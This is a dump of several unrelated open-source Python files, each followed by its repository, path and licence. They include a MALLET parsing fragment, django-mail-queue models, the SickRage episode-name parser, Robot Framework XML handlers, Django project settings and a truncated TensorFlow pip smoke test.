#print article,topic
if topic.startswith('ml') and ('generic' not in topic) and ('?' not in topic) :
query = topic.replace('/', ' ').replace('ml', 'machine learning').replace('nlp', 'natural language processing')
ignore = False
for wt in weak_topics :
if wt in query :
ignore = True
break
if ignore :
continue
article_and_query.append((article, "'%s'" % query))
random.seed(37)
random.shuffle(article_and_query)
for a,q in article_and_query[:num_to_print] :
print a,q
return 0
if __name__ == '__main__' :
try :
exit(main())
except KeyboardInterrupt :
print >> stderr, "Killed by user"
exit(1)
| genie9/pulp | parse_mallet.py | Python | gpl-3.0 | 4,601 |
# -*- coding: utf-8 -*-
# **********************************************************************
#
# Copyright (c) 2003-2017 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************
TestSuite(__file__, [IceGridTestCase()], multihost=False) | ljx0305/ice | cpp/test/IceGrid/activation/test.py | Python | gpl-2.0 | 414 |
import datetime
import logging
import os
from django.conf import settings
from django.core.files.base import ContentFile
from django.core.mail import EmailMultiAlternatives
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from . import defaults
from .utils import get_storage, upload_to
logger = logging.getLogger(__name__)
class MailerMessageManager(models.Manager):
def send_queued(self, limit=None):
if limit is None:
limit = getattr(settings, 'MAILQUEUE_LIMIT', defaults.MAILQUEUE_LIMIT)
for email in self.filter(sent=False)[:limit]:
email.send_mail()
def clear_sent_messages(self, offset=None):
""" Deletes sent MailerMessage records """
if offset is None:
offset = getattr(settings, 'MAILQUEUE_CLEAR_OFFSET', defaults.MAILQUEUE_CLEAR_OFFSET)
if type(offset) is int:
offset = datetime.timedelta(hours=offset)
delete_before = timezone.now() - offset
self.filter(sent=True, last_attempt__lte=delete_before).delete()
@python_2_unicode_compatible
class MailerMessage(models.Model):
created = models.DateTimeField(_('Created'), auto_now_add=True, auto_now=False,
editable=False, null=True)
subject = models.CharField(_('Subject'), max_length=250, blank=True)
to_address = models.TextField(_('To'))
cc_address = models.TextField(_('CC'), blank=True)
bcc_address = models.TextField(_('BCC'), blank=True)
from_address = models.EmailField(_('From'), max_length=250)
reply_to = models.TextField(_('Reply to'), max_length=250, blank=True, null=True)
content = models.TextField(_('Content'), blank=True)
html_content = models.TextField(_('HTML Content'), blank=True)
app = models.CharField(_('App'), max_length=250, blank=True)
sent = models.BooleanField(_('Sent'), default=False, editable=False)
last_attempt = models.DateTimeField(_('Last attempt'), auto_now=False, auto_now_add=False,
blank=True, null=True, editable=False)
objects = MailerMessageManager()
class Meta:
verbose_name = _('Message')
verbose_name_plural = _('Messages')
def __str__(self):
return self.subject
def add_attachment(self, attachment):
"""
Takes a Django `File` object and creates an attachment for this mailer message.
"""
if self.pk is None:
self._save_without_sending()
original_filename = attachment.file.name.split(os.sep)[-1]
file_content = ContentFile(attachment.read())
new_attachment = Attachment()
new_attachment.file_attachment.save(original_filename, file_content, save=False)
new_attachment.email = self
new_attachment.original_filename = original_filename
try:
new_attachment.save()
except Exception as e:
logger.error(e)
new_attachment.file_attachment.delete()
def _save_without_sending(self, *args, **kwargs):
"""
Saves the MailerMessage instance without sending the e-mail. This ensures
other models (e.g. `Attachment`) have something to relate to in the database.
"""
self.do_not_send = True
super(MailerMessage, self).save(*args, **kwargs)
def send_mail(self):
""" Public api to send mail. Makes the determinination
of using celery or not and then calls the appropriate methods.
"""
if getattr(settings, 'MAILQUEUE_CELERY', defaults.MAILQUEUE_CELERY):
from mailqueue.tasks import send_mail
send_mail.delay(self.pk)
else:
self._send()
def _send(self):
if not self.sent:
self.last_attempt = timezone.now()
subject, from_email = self.subject, self.from_address
text_content = self.content
msg = EmailMultiAlternatives(subject, text_content, from_email)
if self.reply_to:
msg.reply_to = [email.strip() for email in self.reply_to.split(',')
if email.strip()]
if self.html_content:
html_content = self.html_content
msg.attach_alternative(html_content, "text/html")
msg.to = [email.strip() for email in self.to_address.split(',') if email.strip()]
msg.cc = [email.strip() for email in self.cc_address.split(',') if email.strip()]
msg.bcc = [email.strip() for email in self.bcc_address.split(',') if email.strip()]
# Add any additional attachments
for attachment in self.attachment_set.all():
path = attachment.file_attachment.path
if os.path.isfile(path):
with open(path, 'rb') as f:
content = f.read()
msg.attach(attachment.original_filename, content, None)
try:
msg.send()
self.sent = True
except Exception as e:
self.do_not_send = True
logger.error('Mail Queue Exception: {0}'.format(e))
self.save()
@python_2_unicode_compatible
class Attachment(models.Model):
file_attachment = models.FileField(storage=get_storage(), upload_to=upload_to,
blank=True, null=True)
original_filename = models.CharField(default=None, max_length=250, blank=False)
email = models.ForeignKey(MailerMessage, on_delete=models.CASCADE, blank=True, null=True)
class Meta:
verbose_name = _('Attachment')
verbose_name_plural = _('Attachments')
def __str__(self):
return str(self.original_filename)
| dstegelman/django-mail-queue | mailqueue/models.py | Python | mit | 5,874 |
# coding=utf-8
# Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import os
import time
import re
import os.path
import regexes
import sickbeard
from sickbeard import logger, helpers, scene_numbering, common, scene_exceptions, db
from sickrage.helper.encoding import ek
from sickrage.helper.exceptions import ex
from dateutil import parser
class NameParser(object):
ALL_REGEX = 0
NORMAL_REGEX = 1
ANIME_REGEX = 2
def __init__(self, file_name=True, showObj=None, tryIndexers=False, naming_pattern=False):
self.file_name = file_name
self.showObj = showObj
self.tryIndexers = tryIndexers
self.naming_pattern = naming_pattern
if self.showObj and not self.showObj.is_anime:
self._compile_regexes(self.NORMAL_REGEX)
elif self.showObj and self.showObj.is_anime:
self._compile_regexes(self.ANIME_REGEX)
else:
self._compile_regexes(self.ALL_REGEX)
@staticmethod
def clean_series_name(series_name):
"""Cleans up series name by removing any . and _
characters, along with any trailing hyphens.
Is basically equivalent to replacing all _ and . with a
space, but handles decimal numbers in string, for example:
>>> cleanRegexedSeriesName("an.example.1.0.test")
'an example 1.0 test'
>>> cleanRegexedSeriesName("an_example_1.0_test")
'an example 1.0 test'
Stolen from dbr's tvnamer
"""
series_name = re.sub(r"(\D)\.(?!\s)(\D)", "\\1 \\2", series_name)
series_name = re.sub(r"(\d)\.(\d{4})", "\\1 \\2", series_name) # if it ends in a year then don't keep the dot
series_name = re.sub(r"(\D)\.(?!\s)", "\\1 ", series_name)
series_name = re.sub(r"\.(?!\s)(\D)", " \\1", series_name)
series_name = series_name.replace("_", " ")
series_name = re.sub(r"-$", "", series_name)
series_name = re.sub(r"^\[.*\]", "", series_name)
return series_name.strip()
def _compile_regexes(self, regexMode):
if regexMode == self.ANIME_REGEX:
dbg_str = u"ANIME"
uncompiled_regex = [regexes.anime_regexes]
elif regexMode == self.NORMAL_REGEX:
dbg_str = u"NORMAL"
uncompiled_regex = [regexes.normal_regexes]
else:
dbg_str = u"ALL"
uncompiled_regex = [regexes.normal_regexes, regexes.anime_regexes]
self.compiled_regexes = []
for regexItem in uncompiled_regex:
for cur_pattern_num, (cur_pattern_name, cur_pattern) in enumerate(regexItem):
try:
cur_regex = re.compile(cur_pattern, re.VERBOSE | re.IGNORECASE)
except re.error, errormsg:
logger.log(u"WARNING: Invalid episode_pattern using %s regexs, %s. %s" % (dbg_str, errormsg, cur_pattern))
else:
self.compiled_regexes.append((cur_pattern_num, cur_pattern_name, cur_regex))
def _parse_string(self, name):
if not name:
return
matches = []
bestResult = None
for (cur_regex_num, cur_regex_name, cur_regex) in self.compiled_regexes:
match = cur_regex.match(name)
if not match:
continue
result = ParseResult(name)
result.which_regex = [cur_regex_name]
result.score = 0 - cur_regex_num
named_groups = match.groupdict().keys()
if 'series_name' in named_groups:
result.series_name = match.group('series_name')
if result.series_name:
result.series_name = self.clean_series_name(result.series_name)
result.score += 1
if 'series_num' in named_groups and match.group('series_num'):
result.score += 1
if 'season_num' in named_groups:
tmp_season = int(match.group('season_num'))
if cur_regex_name == 'bare' and tmp_season in (19, 20):
continue
result.season_number = tmp_season
result.score += 1
if 'ep_num' in named_groups:
ep_num = self._convert_number(match.group('ep_num'))
if 'extra_ep_num' in named_groups and match.group('extra_ep_num'):
result.episode_numbers = range(ep_num, self._convert_number(match.group('extra_ep_num')) + 1)
result.score += 1
else:
result.episode_numbers = [ep_num]
result.score += 1
if 'ep_ab_num' in named_groups:
ep_ab_num = self._convert_number(match.group('ep_ab_num'))
if 'extra_ab_ep_num' in named_groups and match.group('extra_ab_ep_num'):
result.ab_episode_numbers = range(ep_ab_num,
self._convert_number(match.group('extra_ab_ep_num')) + 1)
result.score += 1
else:
result.ab_episode_numbers = [ep_ab_num]
result.score += 1
if 'air_date' in named_groups:
air_date = match.group('air_date')
try:
result.air_date = parser.parse(air_date, fuzzy=True).date()
result.score += 1
except Exception:
continue
if 'extra_info' in named_groups:
tmp_extra_info = match.group('extra_info')
# Show.S04.Special or Show.S05.Part.2.Extras is almost certainly not every episode in the season
if tmp_extra_info and cur_regex_name == 'season_only' and re.search(
r'([. _-]|^)(special|extra)s?\w*([. _-]|$)', tmp_extra_info, re.I):
continue
result.extra_info = tmp_extra_info
result.score += 1
if 'release_group' in named_groups:
result.release_group = match.group('release_group')
result.score += 1
if 'version' in named_groups:
# assigns version to anime file if detected using anime regex. Non-anime regex receives -1
version = match.group('version')
if version:
result.version = version
else:
result.version = 1
else:
result.version = -1
matches.append(result)
if len(matches):
# pick best match with highest score based on placement
bestResult = max(sorted(matches, reverse=True, key=lambda x: x.which_regex), key=lambda x: x.score)
show = None
if not self.naming_pattern:
# try and create a show object for this result
show = helpers.get_show(bestResult.series_name, self.tryIndexers)
# confirm passed in show object indexer id matches result show object indexer id
if show:
if self.showObj and show.indexerid != self.showObj.indexerid:
show = None
bestResult.show = show
elif not show and self.showObj:
bestResult.show = self.showObj
# if this is a naming pattern test or result doesn't have a show object then return best result
if not bestResult.show or self.naming_pattern:
return bestResult
# get quality
bestResult.quality = common.Quality.nameQuality(name, bestResult.show.is_anime)
new_episode_numbers = []
new_season_numbers = []
new_absolute_numbers = []
# if we have an air-by-date show then get the real season/episode numbers
if bestResult.is_air_by_date:
airdate = bestResult.air_date.toordinal()
myDB = db.DBConnection()
sql_result = myDB.select(
"SELECT season, episode FROM tv_episodes WHERE showid = ? and indexer = ? and airdate = ?",
[bestResult.show.indexerid, bestResult.show.indexer, airdate])
season_number = None
episode_numbers = []
if sql_result:
season_number = int(sql_result[0][0])
episode_numbers = [int(sql_result[0][1])]
if not season_number or not len(episode_numbers):
try:
lINDEXER_API_PARMS = sickbeard.indexerApi(bestResult.show.indexer).api_params.copy()
if bestResult.show.lang:
lINDEXER_API_PARMS['language'] = bestResult.show.lang
t = sickbeard.indexerApi(bestResult.show.indexer).indexer(**lINDEXER_API_PARMS)
epObj = t[bestResult.show.indexerid].airedOn(bestResult.air_date)[0]
season_number = int(epObj["seasonnumber"])
episode_numbers = [int(epObj["episodenumber"])]
except sickbeard.indexer_episodenotfound:
logger.log(u"Unable to find episode with date " + str(bestResult.air_date) + " for show " + bestResult.show.name + ", skipping", logger.WARNING)
episode_numbers = []
except sickbeard.indexer_error, e:
logger.log(u"Unable to contact " + sickbeard.indexerApi(bestResult.show.indexer).name + ": " + ex(e), logger.WARNING)
episode_numbers = []
for epNo in episode_numbers:
s = season_number
e = epNo
if bestResult.show.is_scene:
(s, e) = scene_numbering.get_indexer_numbering(bestResult.show.indexerid,
bestResult.show.indexer,
season_number,
epNo)
new_episode_numbers.append(e)
new_season_numbers.append(s)
elif bestResult.show.is_anime and len(bestResult.ab_episode_numbers):
scene_season = scene_exceptions.get_scene_exception_by_name(bestResult.series_name)[1]
for epAbsNo in bestResult.ab_episode_numbers:
a = epAbsNo
if bestResult.show.is_scene:
a = scene_numbering.get_indexer_absolute_numbering(bestResult.show.indexerid,
bestResult.show.indexer, epAbsNo,
True, scene_season)
(s, e) = helpers.get_all_episodes_from_absolute_number(bestResult.show, [a])
new_absolute_numbers.append(a)
new_episode_numbers.extend(e)
new_season_numbers.append(s)
elif bestResult.season_number and len(bestResult.episode_numbers):
for epNo in bestResult.episode_numbers:
s = bestResult.season_number
e = epNo
if bestResult.show.is_scene:
(s, e) = scene_numbering.get_indexer_numbering(bestResult.show.indexerid,
bestResult.show.indexer,
bestResult.season_number,
epNo)
if bestResult.show.is_anime:
a = helpers.get_absolute_number_from_season_and_episode(bestResult.show, s, e)
if a:
new_absolute_numbers.append(a)
new_episode_numbers.append(e)
new_season_numbers.append(s)
# need to do a quick sanity check heregex. It's possible that we now have episodes
# from more than one season (by tvdb numbering), and this is just too much
# for sickbeard, so we'd need to flag it.
new_season_numbers = list(set(new_season_numbers)) # remove duplicates
if len(new_season_numbers) > 1:
raise InvalidNameException("Scene numbering results episodes from "
"seasons %s, (i.e. more than one) and "
"sickrage does not support this. "
"Sorry." % (str(new_season_numbers)))
# I guess it's possible that we'd have duplicate episodes too, so lets
# eliminate them
new_episode_numbers = list(set(new_episode_numbers))
new_episode_numbers.sort()
# maybe even duplicate absolute numbers so why not do them as well
new_absolute_numbers = list(set(new_absolute_numbers))
new_absolute_numbers.sort()
if len(new_absolute_numbers):
bestResult.ab_episode_numbers = new_absolute_numbers
if len(new_season_numbers) and len(new_episode_numbers):
bestResult.episode_numbers = new_episode_numbers
bestResult.season_number = new_season_numbers[0]
if bestResult.show.is_scene:
logger.log(
u"Converted parsed result " + bestResult.original_name + " into " + str(bestResult).decode('utf-8',
'xmlcharrefreplace'),
logger.DEBUG)
# CPU sleep
time.sleep(0.02)
return bestResult
def _combine_results(self, first, second, attr):
# if the first doesn't exist then return the second or nothing
if not first:
if not second:
return None
else:
return getattr(second, attr)
# if the second doesn't exist then return the first
if not second:
return getattr(first, attr)
a = getattr(first, attr)
b = getattr(second, attr)
# if a is good use it
if a is not None or (isinstance(a, list) and a):
return a
# if not use b (if b isn't set it'll just be default)
else:
return b
@staticmethod
def _unicodify(obj, encoding="utf-8"):
if isinstance(obj, basestring):
if not isinstance(obj, unicode):
obj = unicode(obj, encoding, 'replace')
return obj
@staticmethod
def _convert_number(org_number):
"""
Convert org_number into an integer
org_number: integer or representation of a number: string or unicode
Try force converting to int first, on error try converting from Roman numerals
returns integer or 0
"""
try:
# try forcing to int
if org_number:
number = int(org_number)
else:
number = 0
except Exception:
# on error try converting from Roman numerals
roman_to_int_map = (
('M', 1000), ('CM', 900), ('D', 500), ('CD', 400), ('C', 100),
('XC', 90), ('L', 50), ('XL', 40), ('X', 10),
('IX', 9), ('V', 5), ('IV', 4), ('I', 1)
)
roman_numeral = str(org_number).upper()
number = 0
index = 0
for numeral, integer in roman_to_int_map:
while roman_numeral[index:index + len(numeral)] == numeral:
number += integer
index += len(numeral)
return number
def parse(self, name, cache_result=True):
name = self._unicodify(name)
if self.naming_pattern:
cache_result = False
cached = name_parser_cache.get(name)
if cached:
return cached
# break it into parts if there are any (dirname, file name, extension)
dir_name, file_name = ek(os.path.split, name)
if self.file_name:
base_file_name = helpers.remove_extension(file_name)
else:
base_file_name = file_name
# set up a result to use
final_result = ParseResult(name)
# try parsing the file name
file_name_result = self._parse_string(base_file_name)
# use only the direct parent dir
dir_name = os.path.basename(dir_name)
# parse the dirname for extra info if needed
dir_name_result = self._parse_string(dir_name)
# build the ParseResult object
final_result.air_date = self._combine_results(file_name_result, dir_name_result, 'air_date')
# anime absolute numbers
final_result.ab_episode_numbers = self._combine_results(file_name_result, dir_name_result, 'ab_episode_numbers')
# season and episode numbers
final_result.season_number = self._combine_results(file_name_result, dir_name_result, 'season_number')
final_result.episode_numbers = self._combine_results(file_name_result, dir_name_result, 'episode_numbers')
# if the dirname has a release group/show name I believe it over the filename
final_result.series_name = self._combine_results(dir_name_result, file_name_result, 'series_name')
final_result.extra_info = self._combine_results(dir_name_result, file_name_result, 'extra_info')
final_result.release_group = self._combine_results(dir_name_result, file_name_result, 'release_group')
final_result.version = self._combine_results(dir_name_result, file_name_result, 'version')
final_result.which_regex = []
if final_result == file_name_result:
final_result.which_regex = file_name_result.which_regex
elif final_result == dir_name_result:
final_result.which_regex = dir_name_result.which_regex
else:
if file_name_result:
final_result.which_regex += file_name_result.which_regex
if dir_name_result:
final_result.which_regex += dir_name_result.which_regex
final_result.show = self._combine_results(file_name_result, dir_name_result, 'show')
final_result.quality = self._combine_results(file_name_result, dir_name_result, 'quality')
if not final_result.show:
raise InvalidShowException(
"Unable to parse " + name.encode(sickbeard.SYS_ENCODING, 'xmlcharrefreplace'))
# if there's no useful info in it then raise an exception
if final_result.season_number is None and not final_result.episode_numbers and final_result.air_date is None and not final_result.ab_episode_numbers and not final_result.series_name:
raise InvalidNameException("Unable to parse " + name.encode(sickbeard.SYS_ENCODING, 'xmlcharrefreplace'))
if cache_result:
name_parser_cache.add(name, final_result)
logger.log(u"Parsed " + name + " into " + str(final_result).decode('utf-8', 'xmlcharrefreplace'), logger.DEBUG)
return final_result
class ParseResult(object):
def __init__(self,
original_name,
series_name=None,
season_number=None,
episode_numbers=None,
extra_info=None,
release_group=None,
air_date=None,
ab_episode_numbers=None,
show=None,
score=None,
quality=None,
version=None
):
self.original_name = original_name
self.series_name = series_name
self.season_number = season_number
if not episode_numbers:
self.episode_numbers = []
else:
self.episode_numbers = episode_numbers
if not ab_episode_numbers:
self.ab_episode_numbers = []
else:
self.ab_episode_numbers = ab_episode_numbers
if not quality:
self.quality = common.Quality.UNKNOWN
else:
self.quality = quality
self.extra_info = extra_info
self.release_group = release_group
self.air_date = air_date
self.which_regex = []
self.show = show
self.score = score
self.version = version
def __eq__(self, other):
if not other:
return False
if self.series_name != other.series_name:
return False
if self.season_number != other.season_number:
return False
if self.episode_numbers != other.episode_numbers:
return False
if self.extra_info != other.extra_info:
return False
if self.release_group != other.release_group:
return False
if self.air_date != other.air_date:
return False
if self.ab_episode_numbers != other.ab_episode_numbers:
return False
if self.show != other.show:
return False
if self.score != other.score:
return False
if self.quality != other.quality:
return False
if self.version != other.version:
return False
return True
def __str__(self):
if self.series_name is not None:
to_return = self.series_name + u' - '
else:
to_return = u''
if self.season_number is not None:
to_return += 'S' + str(self.season_number).zfill(2)
if self.episode_numbers and len(self.episode_numbers):
for e in self.episode_numbers:
to_return += 'E' + str(e).zfill(2)
if self.is_air_by_date:
to_return += str(self.air_date)
if self.ab_episode_numbers:
to_return += ' [ABS: ' + str(self.ab_episode_numbers) + ']'
if self.version and self.is_anime is True:
to_return += ' [ANIME VER: ' + str(self.version) + ']'
if self.release_group:
to_return += ' [GROUP: ' + self.release_group + ']'
to_return += ' [ABD: ' + str(self.is_air_by_date) + ']'
to_return += ' [ANIME: ' + str(self.is_anime) + ']'
to_return += ' [whichReg: ' + str(self.which_regex) + ']'
return to_return.encode('utf-8')
@property
def is_air_by_date(self):
if self.air_date:
return True
return False
@property
def is_anime(self):
if len(self.ab_episode_numbers):
return True
return False
class NameParserCache(object):
_previous_parsed = {}
_cache_size = 100
def add(self, name, parse_result):
self._previous_parsed[name] = parse_result
while len(self._previous_parsed) > self._cache_size:
del self._previous_parsed[self._previous_parsed.keys()[0]]
def get(self, name):
if name in self._previous_parsed:
logger.log(u"Using cached parse result for: " + name, logger.DEBUG)
return self._previous_parsed[name]
name_parser_cache = NameParserCache()
class InvalidNameException(Exception):
"The given release name is not valid"
class InvalidShowException(Exception):
"The given show name is not valid"
| Maximilian-Reuter/SickRage | sickbeard/name_parser/parser.py | Python | gpl-3.0 | 24,215 |
# Copyright 2008-2013 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robot.errors import DataError
class XmlElementHandler(object):
def __init__(self, execution_result, root_handler=None):
self._stack = [(execution_result, root_handler or RootHandler())]
def start(self, elem):
result, handler = self._stack[-1]
self._stack.append(handler.handle_child(elem, result))
def end(self, elem):
result, handler = self._stack.pop()
handler.end(elem, result)
class _Handler(object):
def __init__(self):
self._child_map = dict((c.tag, c) for c in self._children())
def _children(self):
return []
def handle_child(self, elem, result):
try:
handler = self._child_map[elem.tag]
except KeyError:
raise DataError("Incompatible XML element '%s'" % elem.tag)
return handler.start(elem, result), handler
def start(self, elem, result):
return result
def end(self, elem, result):
pass
def _timestamp(self, elem, attr_name):
timestamp = elem.get(attr_name)
return timestamp if timestamp != 'N/A' else None
class RootHandler(_Handler):
def _children(self):
return [RobotHandler()]
class RobotHandler(_Handler):
tag = 'robot'
def start(self, elem, result):
generator = elem.get('generator', 'unknown').split()[0].upper()
result.generated_by_robot = generator == 'ROBOT'
return result
def _children(self):
return [RootSuiteHandler(), StatisticsHandler(), ErrorsHandler()]
class SuiteHandler(_Handler):
tag = 'suite'
def start(self, elem, result):
return result.suites.create(name=elem.get('name'),
source=elem.get('source', ''))
def _children(self):
return [DocHandler(), MetadataHandler(), SuiteStatusHandler(),
KeywordHandler(), TestCaseHandler(), self]
class RootSuiteHandler(SuiteHandler):
def start(self, elem, result):
result.suite.name = elem.get('name')
result.suite.source = elem.get('source')
return result.suite
def _children(self):
return SuiteHandler._children(self)[:-1] + [SuiteHandler()]
class TestCaseHandler(_Handler):
tag = 'test'
def start(self, elem, result):
return result.tests.create(name=elem.get('name'),
timeout=elem.get('timeout'))
def _children(self):
return [DocHandler(), TagsHandler(), TestStatusHandler(), KeywordHandler()]
class KeywordHandler(_Handler):
tag = 'kw'
def start(self, elem, result):
return result.keywords.create(name=elem.get('name'),
timeout=elem.get('timeout'),
type=elem.get('type'))
def _children(self):
return [DocHandler(), ArgumentsHandler(), KeywordStatusHandler(),
MessageHandler(), self]
class MessageHandler(_Handler):
tag = 'msg'
def end(self, elem, result):
result.messages.create(elem.text or '',
elem.get('level'),
elem.get('html', 'no') == 'yes',
self._timestamp(elem, 'timestamp'))
class _StatusHandler(_Handler):
tag = 'status'
def _set_status(self, elem, result):
result.status = elem.get('status', 'FAIL')
def _set_message(self, elem, result):
result.message = elem.text or ''
def _set_times(self, elem, result):
result.starttime = self._timestamp(elem, 'starttime')
result.endtime = self._timestamp(elem, 'endtime')
class KeywordStatusHandler(_StatusHandler):
def end(self, elem, result):
self._set_status(elem, result)
self._set_times(elem, result)
if result.type == result.TEARDOWN_TYPE:
self._set_message(elem, result)
class SuiteStatusHandler(_StatusHandler):
def end(self, elem, result):
self._set_message(elem, result)
self._set_times(elem, result)
class TestStatusHandler(_StatusHandler):
def end(self, elem, result):
self._set_status(elem, result)
self._set_message(elem, result)
self._set_times(elem, result)
class DocHandler(_Handler):
tag = 'doc'
def end(self, elem, result):
result.doc = elem.text or ''
class MetadataHandler(_Handler):
tag = 'metadata'
def _children(self):
return [MetadataItemHandler()]
class MetadataItemHandler(_Handler):
tag = 'item'
def end(self, elem, result):
result.metadata[elem.get('name')] = elem.text or ''
class TagsHandler(_Handler):
tag = 'tags'
def _children(self):
return [TagHandler()]
class TagHandler(_Handler):
tag = 'tag'
def end(self, elem, result):
result.tags.add(elem.text or '')
class ArgumentsHandler(_Handler):
tag = 'arguments'
def _children(self):
return [ArgumentHandler()]
class ArgumentHandler(_Handler):
tag = 'arg'
def end(self, elem, result):
result.args += (elem.text or '',)
class ErrorsHandler(_Handler):
tag = 'errors'
def start(self, elem, result):
return result.errors
def _children(self):
return [MessageHandler()]
class StatisticsHandler(_Handler):
tag = 'statistics'
def handle_child(self, elem, result):
return result, self
| ktan2020/legacy-automation | win/Lib/site-packages/robot/result/xmlelementhandlers.py | Python | mit | 6,002 |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
class Cat(object):
def Run(self):
print('Meow')
| catapult-project/catapult | telemetry/telemetry/internal/testing/dependency_test_dir/other_animals/cat/cat/cat_object.py | Python | bsd-3-clause | 255 |
"""
Django settings for todolist project.
Generated by 'django-admin startproject' using Django 1.8.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')g#%y07d!0k$=vv)npcgmhgeqk4io4j$36jr8)4gq1(lpsmut4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'todolist.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todolist.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
| tingbaozhao/pythonWeb | todolist/todolist/settings.py | Python | agpl-3.0 | 2,644 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""This pip smoke test verifies dependency files exist in the pip package.
This script runs bazel queries to see what python files are required by the
tests and ensures they are in the pip package superset.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import subprocess
os.chdir(os.path.abspath(os.path.join(os.path.dirname(__file__), "../../..")))
PIP_PACKAGE_QUERY_EXPRESSION = (
"deps(//tensorflow/tools/pip_package:build_pip_package)")
# List of file paths containing BUILD files that should not be included for the
# pip smoke test.
BUILD_DENYLIST = [
"tensorflow/lite",
"tensorflow/compiler/mlir/lite",
"tensorflow/python/kernel_tests/signal",
"tensorflow/examples",
"tensorflow/tools/android",
"tensorflow/python/eager/benchmarks",
]
def GetBuild(dir_base):
"""Get the list of BUILD file all targets recursively startind at dir_base."""
items = []
for root, _, files in os.walk(dir_base):
for name in files:
if (name == "BUILD" and not any(x in root for x in BUILD_DENYLIST)):
items.append("//" + root + ":all")
return items
def BuildPyTestDependencies():
python_targets = GetBuild("tensorflow/python")
tensorflow_targets = GetBuild("tensorflow")
# Build list of test targets,
# python - attr(manual|pno_pip)
targets = " + ".join(python_targets)
targets += ' - attr(tags, "manual|no_pip", %s)' % " + ".join(
tensorflow_targets)
query_kind = "kind(py_test, %s)" % targets
# Skip benchmarks etc.
query_filter = 'filter("^((?!benchmark).)*$", %s)' % query_kind
# Get the dependencies
query_deps = "deps(%s, 1)" % query_filter
return python_targets, query_deps
PYTHON_TARGETS, PY_TEST_QUERY_EXPRESSION = BuildPyTestDependencies()
# TODO(amitpatankar): Clean up denylist.
# List of dependencies that should not included in the pip package.
DEPENDENCY_DENYLIST = [
"//tensorflow/cc/saved_model:saved_model_test_files",
"//tensorflow/cc/saved_model:saved_model_half_plus_two",
"//tensorflow:no_tensorflow_py_deps",
"//tensorflow/tools/pip_package:win_pip_package_marker",
"//tensorflow/core:image_testdata",
"//tensorflow/core/lib/lmdb:lmdb_testdata",
"//tensorflow/core/lib/lmdb/testdata:lmdb_testdata",
"//tensorflow/core/kernels/cloud:bigquery_reader_ops",
"//tensorflow/python:extra_py_tests_deps",
"//tensorflow/python:mixed_precision",
"//tensorflow/python:tf_optimizer",
"//tensorflow/python:compare_test_proto_py",
"//tensorflow/python/framework:test_ops_2",
"//tensorflow/python/framework:test_file_system.so",
"//tensorflow/python/debug:grpc_tensorflow_server.par",
"//tensorflow/python/feature_column:vocabulary_testdata",
"//tensorflow/python/util:nest_test_main_lib",
# lite
"//tensorflow/lite/experimental/examples/lstm:rnn_cell",
